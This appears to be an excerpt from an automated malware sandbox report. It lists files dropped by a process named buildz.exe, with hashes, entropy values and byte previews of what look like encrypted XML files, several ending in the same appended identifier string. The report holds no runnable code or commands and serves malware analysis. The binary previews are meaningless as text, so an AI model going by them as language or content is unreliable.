                        Preview:<?xml.G."...=.vD.....MU.. ./..&........x+.(.`........T.C@./'...z*..on1.Ka._............?R..H|.B.....NU.y......\j8.k.u.*.2...v.U....~...h.(..;..bx(.zP.a,...m...,.....*....j.....]...Y.[.dhhV_..~ .Y].PM$/1>.R............a.H..W.Z.. %/.x..V...-...S. ...DI...=...9.y...v..5..H.s^.G..c#..._.}..1.....B\-.X.Sk...4..z.{.{Wrb./.(Q.O=...PA.vn....o.....E..d...3......X..\....+(L..w.(.I...wi.J.......?.,.<T.....'........D8.Vp.B....p.......&..I.!_...p[...v....fX...I.9+.3+.X..B..J..[..|......8..U....D.#..:.i...n_.i%gs.....,e.:.....mO.z...".4;<s.Q..o.WJ.M...-.C8L.O8..a..K.Ss...6..>...]by....i.hN.B.........{.....q........?...^W.(uf.t.,......Ni.Z...[..m,..#..;.#.Ss..<S_V.Y....i.A,_.|..(R...P...s.G...-F.i....&A$%...;..s.4.HI.h&..(.Y(....5...L!.......a....d.n....I.....p.-P.z...u..u.....a.]..O."....h]....H`rJ...B&....&....&+W...)...........Og..k.G...s...O..Q4..t..M..AsM.Hi..w.Q(.."..i..X%3......t.{.p.}|.{Bg..1.)m....C..w...].M..AAg|...M...sw.2...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1269
                        Entropy (8bit):7.804186019895211
                        Encrypted:false
                        SSDEEP:24:iTNKgmRHroKsVP41ccaSi+NB5zuYnfBdpvzoUJAI5Fzvos5qGbD:iTNAcPO1c3SRfloUNFzvUUD
                        MD5:EBF11A4DCDF8F9932702B233D92CC245
                        SHA1:A0CA1222C9274E73C27207F52766581ED683E543
                        SHA-256:1C2CDADEBC8C42E2E7C4ABC45A58D5BDB8BB26BB6D531995973C74C623A0D177
                        SHA-512:9E4F90F4303C8D30039C990F5B0C066FA145FDBE588CD166F34C6E23232B4B40E574E0815F253716EECE6242F2F7017B429BF833468E6699C45677AFD73D58F6
                        Malicious:false
                        Preview:<?xml.6vYx.g...d..'%.~..L(I.Zq.....,.1.[R..?....>.....M.w...`..N.!.K....].#.u..K..*.8.<...EC.EW.JDT(X........;bR.........F8L$...VtV......{5..9.?.!..Q.c...$.>.....L.....g$..7iK.....]G....B...F+..(.*+x.....(.Q..t.RV.....O.w9...[..M..*...v.....p-.J=..NU....w.B..1+..d'......^^...V..).>{..<...C..(..E?T{...O..!L...X.1..O}".uW?.Qx...-.^,*.? M.......B.!B.#+w.}t.Y^. 4...._K%<.bbX.../.....3...u2O....,C.0t)M...pQf"o....y-~.r..;3.r.R.^=1.sV.K....@:.n......zD....[...(..p.....tn.........S.ra.f.h..O,H...@..hG......Z.W.m..B....e..#.6..7.k..C....).e.X...R....zP.p...v.'n*!.-....V..C.z0S......o.J...2>......)...b..F.......Z.....%iZ.B?......._.*....x4...cD....D.Ck...O.ik......T..n...BVnG..........j....~..."]...6....e...l......9../..i.....M.....[+..K....M....>E.B&...X.' b....S!k.E."'.?......r...C.....6r..n..u...<1<..f.......U........@,.WKBh..ba.Ny.....w4j_......z.W.H..,.*..:...n.(.~...H.D...W5.......%...kB...%.a6..UD.. .e..t....}.C..zh.K/c..,7..d.j/&...{i,8H?J65.[..U^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1088
                        Entropy (8bit):7.8151913907587
                        Encrypted:false
                        SSDEEP:24:SP6aI7I5ZfligyN9mUL3RxW4qZVuOgSjFhh3MjJfGbD:8m7INEI34qZtjFhhsJfUD
                        MD5:DFFF2DE9914727C840733BA556AB0C26
                        SHA1:50F642D02C432A5A9135552ED2E62FAEE9CDC044
                        SHA-256:CB878E45416C155433347C158BD238F298E90D6FDD4C1E8E4D8AEAE9C8E83E85
                        SHA-512:7548F0FAB25B4C9FB90F6798AD96F12B658F21CE14556996F0F2110698940CBDC435971C72D9172DD4050D17195570A70D13DB7B9180D91A71E9B9958098C385
                        Malicious:false
                        Preview:<?xml......y..N*.;...>r2....!..R...Pr.+:..a@.?.<..&U.......~..Mo.t.....6...q<eS.p`..wpA.g$B.`.b.9..191.PD..3....S( .1.)W.y..B.Z......s.H%...6Y.e....q...8..U.....SnS.CBgK.S..K.GL..o..D...=.h..0....}..#}....[...../.ST.\..L:..;..]......_C..z........]...6.G.U.?...7...a._....6...ge..g.86F1.{...4:.h.=q..ty5:.=NJ]ZS...<.[%a..Z.u;......e.......)..@;F.<^.b.58?-....T.6.<w..~!.z.1V..Z...$.........>^I2........g7.:*s.L.<....\<U>'..q.>...\.4..]..4?....>v....T....20t....?..O|9|.P.m.!*H}$0../.R@...\!.........,v..,...k.H......d..L.,n(*.h...K..... ..$..?h.L.+E....p.i.@..........Z......0.@...K..P.._M|1<V..0....+".........1.IB.U.cJ.>.xY...O.........W... }&..........<].mag.U.#...g;...d....i.\\P]^c....X. ..[.L.pN.O.|/.&..C..H......j.V'........C.l.-.y.....I..7......rz.....;.ia...b.B..Ys }|..R]Y....o_..s./..4... <...t../.l4u......8.r..p..e.....g.1..z....1....<p~lf_..RD 4.#;6>.L.....L_\.k8...n@8.u..m..!...........b2*...9......58.L.V....>Jw.x..V>OU..*<^..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1100
                        Entropy (8bit):7.839154691133776
                        Encrypted:false
                        SSDEEP:24:BEV9ttQo52PDn25nR0IL7/3xzsD4F7R+lpK5apAUDRoWNQyaSscwIgLlt7HGbD:BEV9fH527nYRL7F57QlzAQR4SLgLlt7g
                        MD5:A241B6A71644DF1DB51A57FF9C85951C
                        SHA1:9EA2301FAD60D194080296A39C550A4639C6DA59
                        SHA-256:7DE1586A84AA91A1424FC8F3E5BBF4EDD40E907D31688988B76B08E15C4EA0D8
                        SHA-512:4969EA9812C3A178554F1DF8A479AE7F0649571C4D3ABF441B69FEDC0EA0E944F5F3060BF657251CBBBD6A2DA4D2B5514BBBCD1ED1FE22DB8973540D0DF365C7
                        Malicious:false
                        Preview:<?xml*9..I.....P.*G.KY..,&.J.\[T.n.ef!.+.K...z..FL.......*/.....{.'..IuE.c5.v...t.8........G..!..7...iN....XfcO..9.....~5!=....vr ..{i],.j.....0.D.n+f_...mb)...-....{.......B2.?.z.....DuW/.$..&h...\...........-+......Ny\u..).<M.9.=......[.~....<....@A...p.bJM...&2....zM.<.x.8..*/....{...:...*,...Xt....)d.....L8...6nm... ....g.TZ.Jo.....:.7.$...h..&t.lndeb.I(.#.8..4.d.!.!u../..{..r.=.d..%9.?..f...LhC..Mx........I&.@|....^).HD.3.l.#."...-......@.ui_.GR.....,.......ps0...0.$G......6..~...o...+..........{..f.]u....+..1W.....e..a...9.o....s.Rv.LgR)..{};D..W.|N[.P.......s.p...y...(=S..v.Nh..j..<w.....j[..e.eqC... ....z'.LP+...I..JU.........r~......}XlP....%Y.......h^...<.N.3j.....xj......_......;....3c......./1.....g..t.wg$`.W"%:.X3|r..F;..'A.....\o!.R.d..#....Z...%g)...bC..3).|.>.{... ....n..0..i...l...VQc:..}K.=...Hm...Gs....O....#..*.d..Eq..<....n/Bk{..N..~..u...SZ..J@..Gks>.A}.o.........E.Q.(...+..h.\.k.H.i.......n\.#..".2.>T.l.4..1..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192
                        Entropy (8bit):7.815425624061258
                        Encrypted:false
                        SSDEEP:24:q6HWZJATD1tfUOqWjUz4JTNawwZ6fEMqVTMqIBoCEVabHLLYJ5cGbD:VrTcwq4JJaw3MMgMq8oCEVULUcUD
                        MD5:4A06E2B5ED526C40F54D8A7234C312E4
                        SHA1:EC6BA4DB8A611BFB3D75C307E767D10F483DC250
                        SHA-256:E4D276AB9844A38CF18DAD78241017A46C5565DFA559B58CB907BF62E0B1C29B
                        SHA-512:E1A76C251FF8071830695E84289E8DF90BB217BA941C6E47F4471E3732996C2A50961CAEDE6B62678A7B380A6224262BA8DAA64BE1D2967D0EBB04DD4D2D4EA7
                        Malicious:false
                        Preview:<?xml[..ec...$K...G../P.z.l.:....Q'.c./....:..4....(.7.O./*..W.M=.....a,6.......pz.E.T.U6u..%X.v.]}N..L.7a.A.........Y...^.".A+..R._...rE.k...^..7{.+.%|....7.....pB.@7..>.n.b..+uLH(.G..h......t...h.=.C..~..=G.1Pd...K.B..+..r#.N.n=.y..."i.......t...'.c.l.S.e.V.A.l.MP....\.'.m.d.H.....J:U.8(..R.....,....n.o....6k.>.5..2+.x..Ht..._C.R....}P.....40.k..=q..k.+].}.HF..>A.,......?.s~.w<^...E.iM...4/b..J..n.r.-...b..m73Z\y...E..`V.D.cF.D...R..,..V.d..Hd...!.)...D.h.e.B.....8B..m....{.S....6..'K......a..m;V......0......A3...r...4p'...M5l..,...4,.&..^...A.......W..m*.R.U#..Mm..Ox....2...[....B..f7.92...l..H.R.$........D-...sg.b.....mmw..4Fu=..@...ff$f.......X.b.....5.J5...<;.9.........v.a.....G1....'.....{g>._Z..P>}.b.j'...g.R...mQ..R.....7.XV.>....p....<x}.......q..-..h..Q1W..@...-.t.J.......Mp...,..u..V.W0C.,.+.b.......p..q6.)dz.p...;.m.T.@;&....q...?y...r{3T.1...j.=. .......d......8.-..&&..2."r.6...X8.........<.....1 .g}./9.....8.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1031
                        Entropy (8bit):7.7990664059633925
                        Encrypted:false
                        SSDEEP:24:8cbAAN1DfRGTlgXf/LU9vRqEtqAm+Y86CnFTKHGbD:8cbTDD5GT598EtVbYxqUUD
                        MD5:48C86423197E451540D235F391061FCC
                        SHA1:D3722CBBF55502EE8E787A1EDEAECDEEB7B67E91
                        SHA-256:02A810C15F503654C58E695E8ED9D7D7C1D15EF2E1D28080859CF383F4204D77
                        SHA-512:0152AF458EB6BFCDD05717F6E57770D8EA026BBBA57E05EB9D3AE3C850E30A057DFF4142855DC17B3D27118B4C5F722B7444443EAF18F398E60FBBD60BDDA246
                        Malicious:false
                        Preview:<?xmlx..p........oN4h..}.Y..[.i...8..5;..o.L.XED.s.oS..\...#...4.b)/.=W...!}.;.\0..o....2^..X.C....P....b..[*..40l5...P..f.B.i@.. ......T...._..,....=[...GW2.;4.4.ZW9.l.....S.[......:.l=.. ._.|....t..t...d.....A..#.`.+'k..[..D.8.\.v...4.9........q.f.q.X?.GC....y.".$..3.Q....,.01.V!.@...R.m.6;.F....N......%.u.......HQ...*.J.....|sc.."....n...ph.B).........ln....7..)....../.%....{Z..@.J3...-.. .j!_tL.............t4....Hn.#....J..@.`k$.U.x...$c./k.?..PK..q0........)Rf...$|>.'.#..\..;+.S}..M.}D..Oo2............bKP.....=.L.u%<m:@X.k.h.....c.ngXQ 5V.pm...=.:.....o9.bf~..gV.e.r..X...hNp."5.5.a...@..2x.}.......-,...:*.S....V.......?.nU...&w..@.PMz.......\&e.o..'...I.vF.E...N...e#q..5.dDB..c]M..........Fa...,........8f....a.?F.oK........'Vz]..>...YcH.:m...cl......v&......f(......^ .*..0G..i.l..K.f..8.2..X.^..z.c......"...1N..Tg....m...s.s...C....\...+..1...+Q"Q.~.......!..9:n.]...-5...Qj...A.4...S...-YA..d..>EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3884
                        Entropy (8bit):7.952913689535581
                        Encrypted:false
                        SSDEEP:48:EuioPq1oE7bJWvZ8ifCDwMz3sRHB3DedfG+nRXPaXCTqDMlIuffZgOlVapaSUD:pEoExWiiKF3kDeRGICi+M+EZdlsjA
                        MD5:28CBCB87936A36CBE64295A0072291C5
                        SHA1:5DECB60CA8CDDE6C2A7A589C28290FE168B3EAD8
                        SHA-256:DC2A55B645985FB6AE045C659E0B6AD7715EB7330779571A813DBF0072CE2320
                        SHA-512:7BBF46396BBF8DA75C8B57B6476B7D76F5D4616536C9AA9C12717D32DF53EBAB746F106185F231C85216B9DC681CF6CE4D2D5EA7F1382E69D691BB990DC21A96
                        Malicious:false
                        Preview:<?xml~\.8M..l^.C.P..a.R.p.<...qH.8...k.....=].v`.r.:..y..s...\.$~.+-P..C@.....^.`....ViT....h.<..." D...dy....d..]\.Q).2S.u.B.8O.h..>.U.?AD....2.|F...t./.G^....b.....QN....[..1..m....=w.!.....y....@.tno.M.t.........)..O$...9_.?...pF....{..Wu.^P.Vt.t.)@G.U.........e..9...7.?.:m...0..u..H..Hy1...r....h.f.m..f..,..IH.9o.52'!..M.u.yMs6..?.-V....F@......J.H....lJY....ZM..K.3...@IZ......c ._..e.C...h..L.,).Fl.i..yu..U].Z...N.....|.(..siQ..e....._..".b+.B...v.EF........1[w..I._MCy..4.}}.C^.;.9t4.K.eXz..j...l~..)..+.q.]..............bJ.v.-9.!.a..E#\.[....g'J_.2.peI6Z.`...I.....U...(.i.g..@.a...2.......R.....r._..3.g.8..C.6...d.)S.[h.[...OqNu..K.,...|9{oGH...h.[....`.......P.....a...8.....i.$.@x....:.O&...2......\S...h.'.W...7=Gw.=.....).&.........:..JjO.]..%.`|t..M.{...W...]..[Qb...,.U.<A.'..E..`~x..R...~f.)...2.(.......Q................L.......m.....@..!{<.5.|KZ.l.s.+i...g...q..HU..'..1s..k..8..l..R..j..a.x.$>.N..#A.5D.&@.w4.=9r.R=,2I.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):790
                        Entropy (8bit):7.713541490255737
                        Encrypted:false
                        SSDEEP:24:cL16Xv8rxf/5RxAQOXX4b5Eg5TjUs6C9xp9DeMjtGbD:e4X+xfBIQOgRjUMxp9NjtUD
                        MD5:D2E9BEC302BF07015153091A957C2507
                        SHA1:DA20FB157823C427CC7B0524E1A43603406D20FD
                        SHA-256:D0B61589F9D2BCA89636496BB2A52F6A3CF8561213889DA718CAF19C96C08EAF
                        SHA-512:F2B7C29A4961201D02FDA582D76BEE624C006D5B7A2A7F18741882894ED3AACD5A34F2AC9331E632E3C5AE24A016C615B884CCB7913861FDF1E03A08F310FCEE
                        Malicious:false
                        Preview:<?xml.H.2.. By....^<.......G.f...s....../Q}U....@X.."_+..O/.|.......9/0X.e........eqXB.7..r.m....3/.x....(..d.].....x|.b...H.5. +.....2.r.../.A....,j_......cm"./........:...1:.Xv.g...O..~6K.&.e.}K../C......r8..x-m.P .m....IXcq.H...pX.W.*.h..ozA.>%^.iH..\....@.........2x....,......'ex...T..,.FO.].G.#..H...kJ..8.*@_.:..Y4.W...?lC...PI)..\.I...e".s.~...X.N.8.....S..yb..k.=.0....|..:[.=.g]HQ-.`.........r.. Xw.-...u.....?..X.....$.tK.k..=...c....s.....v....Q9.....4./...@.c....x|eSm.........^&.&n..zu.....W.>X..'......D....O..4.F...:..s.E..q?OK|..M\D.[.O..S....3..].uI......|+f.~...I.0......;..%h..O..%.e.......c..HV......1.2z;.......Vpf.wi......9p.....O.U#t.....B.H..P.s..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3934
                        Entropy (8bit):7.956344126351778
                        Encrypted:false
                        SSDEEP:96:hnEaZESTyY6X8DMCwXmEF2ngVVrgLJ2TPJA:hn/TmY6X4MhF2ONA
                        MD5:B5B3739C90894DB7F5208BC64580A9F6
                        SHA1:C0DC8A50B05EC37DB4DA291716A890683D2F6D01
                        SHA-256:43FFEA20F4728E1051EAABEE89E4620CC7F74D6CFEA2065E415810D7C6B7F420
                        SHA-512:E5D536AD70BB0ECDD391E3437469DF94FE6324755ED01536DD99429A14D29514C5C584BBAB028250B2C7B6ABBE337A89C405FD8A36D7CDCDEEB12BABFF2A11E9
                        Malicious:false
                        Preview:<?xml.....g....L...m..{..bZ....p8=..T]F..+..!.......&.4.)u.....&..............^.l.6k>.."^.-.).NQ..n....mo......>...Pk^...a.........(}..2X.z.P...M..C..Sc..DMP..,...<l.........K....>A..s0...p..l...D.$.<d...tc.I....A.n.RSs....P.....]..f..h.....=8Bv.,I0K7.O..'dU...oE.zj.7.R1.&...!..@.........@.R....r.\.u.V.......)0.>..}$P}.B..lJ...+...&F....R.Y.}.......F^.j.+....]1w...g.%e;..).+...._;;........b5.;g........<.Wm.6...a.`......G)..B....r.....j.Nn..V....e.~..}.A....HT:.16./....v..O..4.......>..W..Kd#[m.....Po5F{G|..?.&.._..B..lQ.`..g..l..g.t.a......9RYv..N....G?n..ww=*o.{.@.6.C..x}....z+.#..V..(,1...'cU.[..m...@...^0..]s(.[.9..x....;.^X..2.~5..,C.,..y.UH...+..~...i..Vg....1D..RF[6...c..R.TT..%...b..........5.d7....f.........}I....C.......*.+J..#.......?..*....S.!y.J!..j.X.l......l.A.)56......0.C...W.a..#.SL..(....q.-.?...X...2..`..9..J.W.k..P.hC....nt.<e..[.P..._C.]..<`5"..9.O...BR..{..n...dC64.w..v~...m_U.O..0..d.....Z.".r.s...SBY......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1148
                        Entropy (8bit):7.782448325477643
                        Encrypted:false
                        SSDEEP:24:owskvSaws+9pHZvNNrNVornZydxWhDKFndmWcGbD:opbT5lNrN+rnZoshDKFndmbUD
                        MD5:8ACB403842972B507D691A9F62F74A46
                        SHA1:CC848E75D9C152AF8A057E3F97ABE0746E90FD4F
                        SHA-256:9343170E6A6C3F9B480D7E294BEA307B37204A374E976F2B00EBD4D6250FD53D
                        SHA-512:7FCD29C9382E2D0F927B2B5CFF07DB9B5F320C45ABEF1BCDD919C42C5F10B8BF9DD947045309369CAC9F1CE424C40754F144B55C68BB89A66B7B41629D16A6FE
                        Malicious:false
                        Preview:<?xmlS".......f..&K.C.,\O....A...]..V.$..^..h..z.h.f.3...~...hc......vv...a.B..%7.=$...m.A)......\...Q_@_A....7G..F..x9u....g..iw+vd...*...u(......c.<49Y...kIB.Q$.....-y.K...l..%.+...".Ec)E..PPL.8Z.48^Eu.,y8,..b..&,n....n..9.....$...!D.7fI...V?".:...".$...iW...%_.D.."...%..........d2<.6...n..H..1.".w%..)3L.....Oj...-.?.....[{x7.6.:{.V...........@.wv......!SL.*...m.g..?....x.....)/...R[0 9.I......[.Z...E.../....7.j..Z!....4.Z.8..hIe..N..7..lj.....".....\.x..B..,y..6qd....d.u.MV..v.t..N....*...3Fv..:icj.%.js......C.C........t......0..p..w.........}.w:.9..V=o.......%....@'..hL.N...Z..7.].T.P..7...|..kL.u0.......hC......:..y._E.......9{K..o.-..u.<.........NL.....:j.).5U..0s.#g..$......=.S8.88...m.o$....z.w.W..^..Pj.].(..w...a..7..H{.c..c.a..8Q.d.kOp.6.g...%..N9..a~@%j...\.U..d.=.Y.3...~5...L1...f.6..4=.U....F..1]...)...n.C$.....P7.U.q.$.....i.1......hR.D.......R.......!..k.O.....x0#-;+....;.K.R..tP7G.z.l.....p....P.v..7\.;W9...S.fN.A......G(...c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1782
                        Entropy (8bit):7.8872782101056265
                        Encrypted:false
                        SSDEEP:48:26V1fweR0LwI2sh+fmmsk614TpsicD20fR50zn2ip5jiUUD:dqeR0LJh9mK4TiicLc9phLA
                        MD5:400E9EFA6D0D00FF4FF31E65EDD5DB30
                        SHA1:F78332AF75411104A60FA5A0E0B83FC4D1537896
                        SHA-256:A578428E3CA3CEE7133C9E44A902D0D32F4D821704E11F181F6D43ED154F8822
                        SHA-512:D374AABC3BA8DA211C347BD16A542DE82E82924FE3E698B9EC966305FF0681F38E1A14C7EF9D3F4EA79A83DD0A40277C7F749A528BCAE1AD8E8E148B65DEB427
                        Malicious:false
                        Preview:<?xml.{p.LI.\..M....I.'JpB.5...nTX.'...p64....F..\./..n...7..9E..#&.:.'..)...w...m...n...;....>.g...j.......xdV^..[(..s.......Kxg k:...d...S......7.m..-.Z{..R{P..+...K........O............S^v..DeIH#..%..'..b...Q~...s.2...^..#..i......E3n...x..U .U../\....x.S.2yo..5R............`...J;......"......!|.K8....o.@....#=.0.\M8z._?.YT.._....y.|.!..K.\xeOa....N.u......+!...x.....}.j.&3......[R...*WPGW..;e3.X)..E....t%.].C..$.5F...(....8"A..;.G$w.K.......U.....b..=~.._........E...%u..V....fG..%....w7..0.\....?.T....^....;_01.......0.3qL.fqZ1)K.S0J9.(7bRo&...X.=.(..)!.R.{..3-...R. #.j.u..w..........:g..s."._.i*..?.-.|"$.P.i.O.F.....$5...=.....R.js..:...7o...tW$.i1.Ia..D.H.we.F4.......A.+..H..^..[=gOpJ...(.3.g..H.x.i...4.y....P....F.5.....W.j...].ZX."7..N...N...z.....Z.6-n..|M`.M....e.......2e.3F@Q....6]G_K7.A..H+...q..M.td...u._/5...n.T~.T^t..x."(/C2..L.q.-.}@`b[Y.;..z5#...K.Z..Rp..@.H.. ..2(.!...../.x9....D"*?nU]7...0.....>.L...C...<..#.\....-
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):791
                        Entropy (8bit):7.701022601785163
                        Encrypted:false
                        SSDEEP:24:slxUtcxiOeKnfANtyqJLHhKq9gk2gIeOLppCGbD:slaODnfAtycbYCgtglMeUD
                        MD5:97C6691501C37D7E43BEC45B2200DF17
                        SHA1:60B100D9043F4245DC249AA87C4831EC381ECFA0
                        SHA-256:A239F57ABAAD965449C194627570BE85E0E3007A7D7B28ADF13E93D47C8816A7
                        SHA-512:E831DEC304B4FD2D6CA3E1E85AB851F5D000BE1C1FBD7AA5D5808502FB36B8DC0B69F959366F0886221689D018A2ED0AF70E4594A85F1AF8CD64B08F90B86A68
                        Malicious:false
                        Preview:<?xml.He|.@)c.3.......B..\gp.....%.r<..v.......R.%.0....d..$|..<....'....<.F.(.....7)/..._i.........Qa..<....1k..l..*O.0.._q\.}...hcnXH...h........".f...s...R.j7..@M?.F....x..RT...,O..P...zPc.Zt.ZX>..LAkxF..X.W@.\r4.~..0..&x...B.+....h.....n......7.......N...|G......M.i..B{s......FI ..dHd?.>..."..X..[.f.o.z....D.Zc...O.ykU".k.a....v...NZ.;%...*...*9......+...OKm{`..".PS.!._..d...r...S.!...?~p.4@..w.~#.(...(H#.f}PYM-..&C.e..8%.h...0k.3./.....~......*d6@".. .....E....|..g6=U.......A..:....a..VS.a.Q.......z....r~...V..$}U..0o.!..A.kB...l.c...X..7../.BS.5.:.A..i....l....v@d..L.>%.Y.=....H...<.I`.....G....K'2]..T.E...>.........5h.u.......`....G.=o.(7.=..._....cq.....P..}.).EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1082
                        Entropy (8bit):7.799693210805921
                        Encrypted:false
                        SSDEEP:24:V90jZQb2c+5upGbkFkeLfOUmz7CNjqXwyXLP/cRYcKXLGbD:V90jZ82c+IukLrRoWNeXwULP/c6cwUD
                        MD5:D790186AF66AAB16F99BE6EF5969FB5C
                        SHA1:ED3425101BB1CC6CE662D3FD83A5829D7C122F11
                        SHA-256:0AB7EBA4BD7D6C3789FB93C36EBC0727DB163B198EA0CCFFD5318437744C4A85
                        SHA-512:28D7FC75CE8933BE015C5E4F579D8B43E982A27FFE2486D7673347601F6EBCB1AA1B0E37268164EED1194BE1C8877915C63E7A741BE51231DDC5E2691A710E34
                        Malicious:false
                        Preview:<?xmlt.Sy.IjA..".........)_.....Y.I:S^.nX...8..`@.d..r.M..{3..&w..?.~.........F..P*.R.E5..l...E.pCZ].nv.NNv...Cg....q........r..A<.*S...#hS...Ma......w.c.R(...Gp.K.j.X..Q.4........0...`.4w\/.a=d0tFS;f{.,x.uW....o....c.K.U.Lh.PA."9.'.....2..$j...=...F4i..H..........XaTm...f.|K...I.r.....Ag.@mC.C.+.H..|..C.Od........e.:.....i:.WQ.....(P...c.../R(.v$........Qh...e.;g.....~.QR:.|..r.b./......K.Oqc......&............~<.ok.$..O6]x.0...ZDZT.W..L.z...r(..P...R.....M...".x..._#..\.%:v...(|..2q......UAj=......,7.'.gKb.. .K..Z.'.j..|...y..N...F$2..(h....sa.{$z.%.......d.....`}i..}..W...D.......C....x......~.4.1#u..3b.6..S..x).l..b}...sr../.W.z..7Ey..o.w..L.....R..-.2J..H..kp..'./z...Pt0....Q..1.r.{..u...I....1.$.M.|....-.;R.......C.)-....:...)!.O...}#...3.U-`v.6-...O.....C.p.]RX%... .~..cr,Ws..po\hv.Fa.8Y...AtB%..@+.6..T..@.....pHo8...e..D..u.A..+.6....!.Q4..,m'.;...,..<).lk..Hl...B..k.g...N...-..A.F$...1..:a..p.v.q...8...1Y...........I.3.`.7.*.....@..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1061
                        Entropy (8bit):7.79367211999082
                        Encrypted:false
                        SSDEEP:24:QNinwE/tbqBFJnHc+gew8bweujjFaH9YGAcV1GbD:P/JqL18vew8pwjFanBXUD
                        MD5:2FA41DF60776DA0BEEED07FE49AD4477
                        SHA1:23BE0A1F446BE54826416E5B21844D4FA1892624
                        SHA-256:C4EE58D31B01E1EA528AD6C5FEF981BF4B59BFF4CC778D898637A6104532C1DC
                        SHA-512:C526E6665F4251A662CAAEB707349D6E5ADD771FC302F3AD5882ECC5FD9A6BD65717B266597B239C00E035B98C1356D25356AFBED75BF3E97B494F1B049F3DFB
                        Malicious:false
                        Preview:<?xml'.`.z..[..B..,.C.f~<..R..C\....4~...d..R..`....0+...._l..h.5Z..[......t.Y.!.{..#.0....9..x[J..=..Q.W...>.*.?....i.....r.)c_.I.Y. ,u{!a....".$..d!d....6.....Uj!.t...|C...91....".q....0.. .V..6].-{_.L..v....../.+s.o.2..O....|g...5..x./...".`..p..[0.....Z.....{..z.....y.w.@..~t...c.R.*{.n%..hh1F.......s....c%w.l.....o.r.8)..!.p.f..........'wz......,...Yp.GG#[..K}nN.9m...h<..bD._...r.o..+.......2.}.....6.r...w....'.Ue......2.. 1n$a..|..N.:#8...$G.F.ZL=b.N..vc.?.....K6Td.~..6U.....U.%V+G.-Q...DP..h......t.#0[...hvv..1...g..~V.|czp.x... ..0hC.....M.$..BC....;.R..u.mK..F..mD..LW.....d..Q...:\....b...R..>...R.$,.......oU.."....9.....u.^........R..............;....l..\. e.2..N.....%.....v........r..O...3<q....'......hJMTO`@.....JKQ..k..DT.=.m...&J.4Fa!....D|e&...6.u..F...~...L..+:.1...J.G.`........9.F|...GB...J..z.W...`.$ba..e.<I.^...v.1/l.c...o..@/n....u.."$.:.Q.'.....7._.k.4....6!.......<..i.*....y.yb.wW.X........&S.g2n7K..EdRvSqD59xL4qFRlN
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.728592800543605
                        Encrypted:false
                        SSDEEP:12:R3dxTuPPiWk7jfaQkh4qg6fH86zx/x5SnF9mFRV57aZoZVg4z39aynztNnYi/s7A:R3dciWtQk8t6InCBlaY9aCz/nb0LHGbD
                        MD5:2B72082A15A3C640A04FE3D4AE1F3D35
                        SHA1:82A978A0C03754352986E46314DF06A2C285C589
                        SHA-256:6F3FD92F933CEA938DE4B3AC19D8A09FE1822A0B43C88F4ED156E46C887994E3
                        SHA-512:C14F8095B6589B9FA4B4515F10095C557959C6A9B0AE49227A768E4397A252CD13E9E6159F363CBFD176E879FFC7723ACE98FEE53C2A71BDDDEB0979FD606F49
                        Malicious:false
                        Preview:<?xml...X.3.....Om.)..S.E... ..p.A%zvPN...KX....n....2.8...|Rtu+$!E.YXz.l..Z.....G.>.t...,. v.-..R../.....?.m..0l....;[..L.."Y.to]is.%U.....e"..k6..bo....M.=...f3..+..3g.S:]sR.%.>.....f......l....l..x...).KC....i.9~..q..%.{...!.y.C...^'K.!..{!.......!...D..ky..r...[.C....o....v .@./Yq1..QH.N.g..%w9h...~...u.......PN7.h..v.. eZ.lw.F.8.IW.x.....r.E....B..w....Za).J..BV.2.{?.6V..0@y..S1~mGy..........Qp....08...DDb....0.E....rk..eV.1>...B.M.._cX/H..y.[0...@?s=.p_..X^^..*`..r.?%..oZ...N....H...........&~...zB..Q..5p.D...(.....L2....K.Q...q.\..z....*.......n.n.8.RD.V.)...tXSy.=.o1...9.=.wn.$.i/=tP>.w..`O.............d........=o}..........W^..R..Q.F....M....t..Y-...~a...|$..t.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1485
                        Entropy (8bit):7.863452860959849
                        Encrypted:false
                        SSDEEP:24:kGCUT3aT4jwdyka6Plt2RU03UHt1nvGxzv/Hj5XBi5nIio8tgLsD2uQeoxbYv1b6:KIkYkHVhHtoxDflXGIiR4/2oxM4Ygo4j
                        MD5:21D5B7E0EEAE1D27AA9C02EBCC354FDA
                        SHA1:47A906BE7CF5685E51317DD3035F95300245C8F0
                        SHA-256:3BB2072EB77EF99DBC919E40857482C2E1CBFFE89AA1352934C1A4987810B971
                        SHA-512:84B184C9F8370DFF87E95B81720E05BB0AA0C9EBAFF21297CD36177E8E5017913DF97291F59485BC9C00AB1591954906C70EC5C5522D2573F976EDCC35D398B9
                        Malicious:false
